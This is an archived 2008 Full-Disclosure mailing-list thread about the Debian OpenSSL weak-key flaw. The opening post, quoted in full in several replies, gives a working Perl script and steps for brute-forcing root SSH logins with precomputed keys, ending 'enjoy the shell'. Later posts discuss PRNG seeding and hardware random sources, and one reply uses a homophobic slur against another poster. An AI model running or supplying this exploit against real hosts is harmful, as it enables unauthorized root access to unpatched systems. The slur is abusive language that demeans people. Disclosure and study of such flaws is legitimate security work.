Mailing List Archive: Full Disclosure: Full-Disclosure

Working exploit for Debian generated SSH Keys

Full Disclosure full-disclosure RSS feed

Index | Next | Previous | View Threaded

mm at deadbeef

May 14, 2008, 11:35 PM

Post #1 of 14 (1520 views)
Permalink

Working exploit for Debian generated SSH Keys

Hi full-disclosure,

the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
Bits, generated on an upatched debian (this is the key this exploit will
break)

4. Run the perl script and give it the location to where you extracted
the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
print "By mm[at]deadbeef.de\n";
exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
chomp;
next unless m,^\d+$,;
push(@a, $_);
if (scalar(@a) > $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm[at]deadbeef.de

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

bobb.harley at gmail

May 18, 2008, 8:13 AM

Post #2 of 14 (1365 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Anyone have a copy of
rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
The web server isn't playing nicely ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:

> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
> print "By mm[at]deadbeef.de\n";
> exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
> chomp;
> next unless m,^\d+$,;
> push(@a, $_);
> if (scalar(@a) > $keysPerConnect) {
> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
> @a = ();
> }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> mm[at]deadbeef.de
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

fdiggle at gmail

May 18, 2008, 8:58 PM

Post #3 of 14 (1351 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Yes Fredrick Diggle will get you a copy :)

On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley[at]gmail.com> wrote:
> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
> nicely ;-)
>
> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:
>>
>> Hi full-disclosure,
>>
>> the debian openssl issue leads that there are only 65.536 possible ssh
>> keys generated, cause the only entropy is the pid of the process
>> generating the key.
>>
>> This leads to that the following perl script can be used with the
>> precalculated ssh keys to brute force the ssh login. It works if such a
>> keys is installed on a non-patched debian or any other system manual
>> configured to.
>>
>> On an unpatched system, which doesn't need to be debian, do the following:
>>
>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>
>> 2. Extract it to a directory
>>
>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
>> Bits, generated on an upatched debian (this is the key this exploit will
>> break)
>>
>> 4. Run the perl script and give it the location to where you extracted
>> the bzip2 mentioned.
>>
>> #!/usr/bin/perl
>> my $keysPerConnect = 6;
>> unless ($ARGV[1]) {
>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>> print "By mm[at]deadbeef.de\n";
>> exit 0;
>> }
>> chdir($ARGV[0]);
>> opendir(A, $ARGV[0]) || die("opendir");
>> while ($_ = readdir(A)) {
>> chomp;
>> next unless m,^\d+$,;
>> push(@a, $_);
>> if (scalar(@a) > $keysPerConnect) {
>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>> ".$_ } @a)." ".$ARGV[1]);
>> @a = ();
>> }
>> }
>>
>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>
>> Regards,
>> Markus Mueller
>> mm[at]deadbeef.de
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

reepex at gmail

May 18, 2008, 9:20 PM

Post #4 of 14 (1350 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

why don't you code it yourself instead of being a script kiddie faggot. and
don't use ";-)" to look cool when you beg for warez.

On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley[at]gmail.com> wrote:

> Anyone have a copy of rsa.2048.tar.bzip2<http://www.deadbeef.de/rsa.2048.tar.bzip2>?
> The web server isn't playing nicely ;-)
>
>
> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:
>
>> Hi full-disclosure,
>>
>> the debian openssl issue leads that there are only 65.536 possible ssh
>> keys generated, cause the only entropy is the pid of the process
>> generating the key.
>>
>> This leads to that the following perl script can be used with the
>> precalculated ssh keys to brute force the ssh login. It works if such a
>> keys is installed on a non-patched debian or any other system manual
>> configured to.
>>
>> On an unpatched system, which doesn't need to be debian, do the following:
>>
>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>
>> 2. Extract it to a directory
>>
>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
>> Bits, generated on an upatched debian (this is the key this exploit will
>> break)
>>
>> 4. Run the perl script and give it the location to where you extracted
>> the bzip2 mentioned.
>>
>> #!/usr/bin/perl
>> my $keysPerConnect = 6;
>> unless ($ARGV[1]) {
>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>> print "By mm[at]deadbeef.de\n";
>> exit 0;
>> }
>> chdir($ARGV[0]);
>> opendir(A, $ARGV[0]) || die("opendir");
>> while ($_ = readdir(A)) {
>> chomp;
>> next unless m,^\d+$,;
>> push(@a, $_);
>> if (scalar(@a) > $keysPerConnect) {
>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>> ".$_ } @a)." ".$ARGV[1]);
>> @a = ();
>> }
>> }
>>
>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>
>> Regards,
>> Markus Mueller
>> mm[at]deadbeef.de
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

reepex at gmail

May 18, 2008, 9:32 PM

Post #5 of 14 (1340 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Could you never write perl again please? Perl underground should take a shot
at your stuff but you are not worth it.

On Thu, May 15, 2008 at 1:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:

> Hi full-disclosure,
>
> the debian openssl issue leads that there are only 65.536 possible ssh
> keys generated, cause the only entropy is the pid of the process
> generating the key.
>
> This leads to that the following perl script can be used with the
> precalculated ssh keys to brute force the ssh login. It works if such a
> keys is installed on a non-patched debian or any other system manual
> configured to.
>
> On an unpatched system, which doesn't need to be debian, do the following:
>
> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>
> 2. Extract it to a directory
>
> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
> Bits, generated on an upatched debian (this is the key this exploit will
> break)
>
> 4. Run the perl script and give it the location to where you extracted
> the bzip2 mentioned.
>
> #!/usr/bin/perl
> my $keysPerConnect = 6;
> unless ($ARGV[1]) {
> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
> print "By mm[at]deadbeef.de\n";
> exit 0;
> }
> chdir($ARGV[0]);
> opendir(A, $ARGV[0]) || die("opendir");
> while ($_ = readdir(A)) {
> chomp;
> next unless m,^\d+$,;
> push(@a, $_);
> if (scalar(@a) > $keysPerConnect) {
> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
> ".$_ } @a)." ".$ARGV[1]);
> @a = ();
> }
> }
>
> 5. Enjoy the shell after some minutes (less than 20 minutes)
>
> Regards,
> Markus Mueller
> mm[at]deadbeef.de
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

rvdwesten at gmail

May 19, 2008, 3:37 AM

Post #6 of 14 (1337 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Why reinvent the wheel?

On Mon, May 19, 2008 at 6:20 AM, reepex <reepex[at]gmail.com> wrote:
> why don't you code it yourself instead of being a script kiddie faggot. and
> don't use ";-)" to look cool when you beg for warez.
>
> On Sun, May 18, 2008 at 10:13 AM, bob harley <bobb.harley[at]gmail.com> wrote:
>>
>> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing
>> nicely ;-)
>>
>> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <mm[at]deadbeef.de> wrote:
>>>
>>> Hi full-disclosure,
>>>
>>> the debian openssl issue leads that there are only 65.536 possible ssh
>>> keys generated, cause the only entropy is the pid of the process
>>> generating the key.
>>>
>>> This leads to that the following perl script can be used with the
>>> precalculated ssh keys to brute force the ssh login. It works if such a
>>> keys is installed on a non-patched debian or any other system manual
>>> configured to.
>>>
>>> On an unpatched system, which doesn't need to be debian, do the
>>> following:
>>>
>>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
>>>
>>> 2. Extract it to a directory
>>>
>>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048
>>> Bits, generated on an upatched debian (this is the key this exploit will
>>> break)
>>>
>>> 4. Run the perl script and give it the location to where you extracted
>>> the bzip2 mentioned.
>>>
>>> #!/usr/bin/perl
>>> my $keysPerConnect = 6;
>>> unless ($ARGV[1]) {
>>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
>>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
>>> print "By mm[at]deadbeef.de\n";
>>> exit 0;
>>> }
>>> chdir($ARGV[0]);
>>> opendir(A, $ARGV[0]) || die("opendir");
>>> while ($_ = readdir(A)) {
>>> chomp;
>>> next unless m,^\d+$,;
>>> push(@a, $_);
>>> if (scalar(@a) > $keysPerConnect) {
>>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
>>> ".$_ } @a)." ".$ARGV[1]);
>>> @a = ();
>>> }
>>> }
>>>
>>> 5. Enjoy the shell after some minutes (less than 20 minutes)
>>>
>>> Regards,
>>> Markus Mueller
>>> mm[at]deadbeef.de
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
Ronald van der Westen

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

boklm at mars-attacks

May 19, 2008, 4:09 AM

Post #7 of 14 (1339 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

On Mon, 19 May 2008, Ronald van der Westen wrote:

> Why reinvent the wheel?

Why not ?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

roryflyguy at googlemail

May 19, 2008, 4:50 AM

Post #8 of 14 (1312 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

>_>

#1: It cant be that hard to generate random numbers.
#2: It's hardly the wheel.
#3: Again, pointless arguments.

On 19 May 2008, at 12:09, nicolas vigier wrote:

> On Mon, 19 May 2008, Ronald van der Westen wrote:
>
>> Why reinvent the wheel?
>
> Why not ?
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

groffg at gmgdesign

May 19, 2008, 10:51 AM

Post #9 of 14 (1314 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I think the "wheel" in this context refers to exploit code, not PRNG code.

Generating pseudo-random numbers isn't hard given a good API, but writing
that API is non-trivial (assuming you want high entropy/low
predictability). And, apparently, screwing up that API is also very easy.

- - G

- ----- Original Message -----
From: "Skratz0r" <roryflyguy[at]googlemail.com>
To: "nicolas vigier" <boklm[at]mars-attacks.org>
Cc: <full-disclosure[at]lists.grok.org.uk>
Sent: Monday, May 19, 2008 7:50 AM
Subject: Re: [Full-disclosure] Working exploit for Debian generated SSH
Keys

> >_>
>
> #1: It cant be that hard to generate random numbers.
> #2: It's hardly the wheel.
> #3: Again, pointless arguments.
>
> On 19 May 2008, at 12:09, nicolas vigier wrote:
>
>> On Mon, 19 May 2008, Ronald van der Westen wrote:
>>
>>> Why reinvent the wheel?
>>
>> Why not ?
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.6.2 (Build 2014) - not licensed for commercial use:
www.pgp.com

wj8DBQFIMb4YSGIRT5oVahwRAuQXAJ9UkoJplYiA6DiVbeRTbkwTDoovZQCeN7ir
t3YvNW8PRxJh3Fb4VrZ1ZDo=
=+k/9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

tonnerre.lombard at sygroup

May 19, 2008, 11:51 PM

Post #10 of 14 (1291 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Salut, Garrett,

On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote:
> Generating pseudo-random numbers isn't hard given a good API, but
> writing that API is non-trivial (assuming you want high entropy/low
> predictability). And, apparently, screwing up that API is also very
> easy.

Generating real pseudo-random streams is a hard problem which is way
more than what people can handle. Usually, PRNGs are composed of
various periodic elements which, in the end, all combined produce a
repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC
for this as a state machine and extracts some state bits as random
stream on every access.

We're not debating the PRNG itself here but the _seed_. OpenSSL
supports various ways to influence the state of the PRNG at various
stages by XORing in new material; however, Debian chose to only support
pre-seeding with uninitialized memory and the Process ID. With the
elimination of the uninitialized memory as seed, the seed for the MAC
was entirely comprised by the PID.

So we're not debating a weakness in the PRNG here at all, which is a
_very_ delicate subject.

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33 Güterstrasse 86
Fax:+41 61 383 14 67 4053 Basel
Web:www.sygroup.ch tonnerre.lombard[at]sygroup.ch

Attachments:

signature.asc (0.81 KB)

groffg at gmgdesign

May 20, 2008, 5:49 AM

Post #11 of 14 (1273 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yep, agreed.

- - G

Salut, Garrett,

On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote:
> Generating pseudo-random numbers isn't hard given a good API, but
> writing that API is non-trivial (assuming you want high entropy/low
> predictability). And, apparently, screwing up that API is also very
> easy.

Generating real pseudo-random streams is a hard problem which is way
more than what people can handle. Usually, PRNGs are composed of
various periodic elements which, in the end, all combined produce a
repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC
for this as a state machine and extracts some state bits as random
stream on every access.

We're not debating the PRNG itself here but the _seed_. OpenSSL
supports various ways to influence the state of the PRNG at various
stages by XORing in new material; however, Debian chose to only support
pre-seeding with uninitialized memory and the Process ID. With the
elimination of the uninitialized memory as seed, the seed for the MAC
was entirely comprised by the PID.

So we're not debating a weakness in the PRNG here at all, which is a
_very_ delicate subject.

Tonnerre
- --
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33 Güterstrasse 86
Fax:+41 61 383 14 67 4053 Basel
Web:www.sygroup.ch tonnerre.lombard[at]sygroup.ch

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.6.2 (Build 2014) - not licensed for commercial use:
www.pgp.com

wj8DBQFIMsjuSGIRT5oVahwRAlLrAJ9O7/osiw1tbwq7tjWPV0jjn/53dQCgwjik
IZ7FHvEZJsdKXiRkRvE5uN4=
=/qAR
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Valdis.Kletnieks at vt

May 20, 2008, 8:51 AM

Post #12 of 14 (1289 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

On Mon, 19 May 2008 13:51:29 EDT, "Garrett M. Groff" said:

> Generating pseudo-random numbers isn't hard given a good API, but writing
> that API is non-trivial (assuming you want high entropy/low
> predictability). And, apparently, screwing up that API is also very easy.

Of course, if you're trying to write a PoC, you don't need to know how to
code the API - all you need to do is grab the source for the key-tester that
got shipped as part of the OpenSSH patch and snarf out the nicely enumerated
list of all vulnerable keys, and use that list as the brute-forcer, 6 per
connection attempt. ;)

michael.holstein at csuohio

May 20, 2008, 10:41 AM

Post #13 of 14 (1285 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

> Generating real pseudo-random streams is a hard problem which is way
> more than what people can handle. Usually, PRNGs are composed of
> various periodic elements which, in the end, all combined produce a
> repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC
> for this as a state machine and extracts some state bits as random
> stream on every access.
>

Smoke Detector + Webcam = cheapo RNG

http://inventgeek.com/Projects/alpharad/overview.aspx

I know some highly secure operations (eg: web casinos, using Geiger
counters and background radiation) use a version of this for their RNGs,
and random.org does it with RF (radios listening to static) .. do
patches exist for OpenSSL to use hardware devices? (short of a hack to
take something like the above and pipe it to /dev/random, etc).

Cheers,

Michael Holstein
Cleveland State University

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

tonnerre.lombard at sygroup

May 23, 2008, 12:48 AM

Post #14 of 14 (1207 views)
Permalink

Re: Working exploit for Debian generated SSH Keys [In reply to]

Salut, Michael,

On Tue, 20 May 2008 13:41:41 -0400, Michael Holstein wrote:
> Smoke Detector + Webcam = cheapo RNG

We were talking about PRNGs here, which are highly complex mathematical
constructs, not hardware RNGs, which are also slightly hairy though.
There are a couple of books on PRNG design, and even if you read them
you probably still need a couple of years to design a secure PRNG.

> I know some highly secure operations (eg: web casinos, using Geiger
> counters and background radiation) use a version of this for their
> RNGs, and random.org does it with RF (radios listening to static) ..
> do patches exist for OpenSSL to use hardware devices? (short of a
> hack to take something like the above and pipe it to /dev/random,
> etc).

OpenSSL would probably be slightly the wrong place to do this. The BSD
systems tend to have kernel drivers for various hardware random
sources, XORing them into each other to eliminate the problem with weak
random sources. You can then distill this through the /dev/random
device. OpenSSL needs a build flag to make use of this additional
random material then, I think they add a certain amount of random
material to their MD on each iteration.

Please note that even hardware random sources are of quite varying
quality. Like you said, a Geiger counter provides you with quite
high-quality random numbers since, to our knowledge, quantum effects
are rather hard to predict. You can also use hard disk seek times as a
RNG source, but the quality is rather poor in this case, and you should
only use it in addition to other sources.

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33 Güterstrasse 86
Fax:+41 61 383 14 67 4053 Basel
Web:www.sygroup.ch tonnerre.lombard[at]sygroup.ch

Attachments:

signature.asc (0.81 KB)

Index | Next | Previous | View Threaded

Interested in having your list archived? Contact lists@gossamer-threads.com